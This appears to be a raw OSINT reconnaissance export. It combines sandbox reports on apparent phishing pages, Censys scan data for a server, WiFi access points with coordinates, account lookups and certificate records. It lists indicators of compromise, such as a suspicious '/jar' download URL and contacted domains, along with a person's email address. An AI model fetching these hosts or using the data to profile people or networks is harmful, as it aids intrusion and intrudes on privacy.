"ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CKP14N3S.txt]- [targetUID: 00000000-00003116]\n "Cab1D81.tmp" has type "data"- Location: [%TEMP%\\Cab1D81.tmp]- [targetUID: 00000000-00002120]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002120]\n "Cab186C.tmp" has type "data"- Location: [%TEMP%\\Cab186C.tmp]- [targetUID: 00000000-00002120]\n "newnetflix_2_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /newnetflix/"'}, | 185.199.108.153 |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Geocaching (Category: social)
https://www.geocaching.com/p/?u=login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:1C:9A) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ArmorGames (Category: gaming)
https://armorgames.com/user/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation2.4 (Net ID: 00:01:9F:30:06:78) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative projects | cdn-185-199-111-153.github.com |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 13335 | 172.67.160.0/20 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.223 | 104.196.30.220 |
| 2023-05-12 02:45:10 | Linked URL - Internal | No | Hybrid Analysis | 4 | 0 | 1 | 0 | None | http://kekw.battleb0t.xyz/jar | battleb0t.xyz |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:8443 | 188.114.96.0/24 |
| 2023-05-12 03:00:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | jcorrea@mottomortgage.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'54.196.16.164'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://hilarious-kelpie-473db1.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd"\n "www.herokucdn.com"\n "o.ss2.us"\n "crl.rootg2.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "crl.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d00_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_d00_ConnHashTable<3328>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d00_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d00_IESQMMUTEX_0_519"\n "IsoScope_d00_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3328"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d00_IE_EarlyTabStart_0x424_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "54.196.16.164:80"\n "99.84.238.168:80"\n "99.84.238.168:443"\n "99.84.224.224:80"\n "99.84.224.90:80"\n "99.84.224.108:80"\n "99.84.224.214:80"\n "99.84.224.3:80"\n "99.84.224.217:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"TR7K5OKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TR7K5OKT.txt]- [targetUID: 00000000-00003328]\n "73DA0AE306CF69ADAC457DB6B2997338" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00001732]\n "~DFC7FE55AAA15340B0.TMP" has type "data"- Location: [%TEMP%\\~DFC7FE55AAA15340B0.TMP]- [targetUID: 00000000-00003328]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00003328]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00003328]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00001732]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00001732]\n "2C9HMCBU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2C9HMCBU.txt]- [targetUID: 00000000-00003328]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003328]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00001732]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00001732]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003328]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003328]\n "BCB67D7ECB470284AF35679F339E879F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BCB67D7ECB470284AF35679F339E879F]- [targetUID: 00000000-00001732]\n "~DF9154BC8BBA72FEBA.TMP" has type "data"- Location: [%TEMP%\\~DF9154BC8BBA72FEBA.TMP]- [targetUID: 00000000-00003328]\n "FVK5E2PX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FVK5E2PX.txt]- [targetUID: 00000000-00003328]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003328]\n "~DF4D25D5B6C6F1C182.TMP" has type "data"- Location: [%TEMP%\\~DF4D25D5B6C6F1C182.TMP]- [targetUID: 00000000-00003328]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd" seems to be random\n "www.herokucdn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hilarious-kelpie-473db1.netlify.app/"- [Source: Input]\n Pattern match: "https://hilarious-kelpie-473db1.netlify.app"- [Source: Input]\n Pattern match: "www.herokucdn.com"- [Source: PCAP]\n Pattern match: "http://unsub1.cfd/"- [Source: PCAP]\n Heuristic match: "o.ss2.us"- [Source: PCAP]\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"- [Source: PCAP]\n Heuristic match: "crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootg2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootca1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEA11CXliCX0s5ZbPbTWItcU%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /sca1b-1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.sca1b.amazontrust.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_ |
| 2023-05-12 02:57:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 7 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
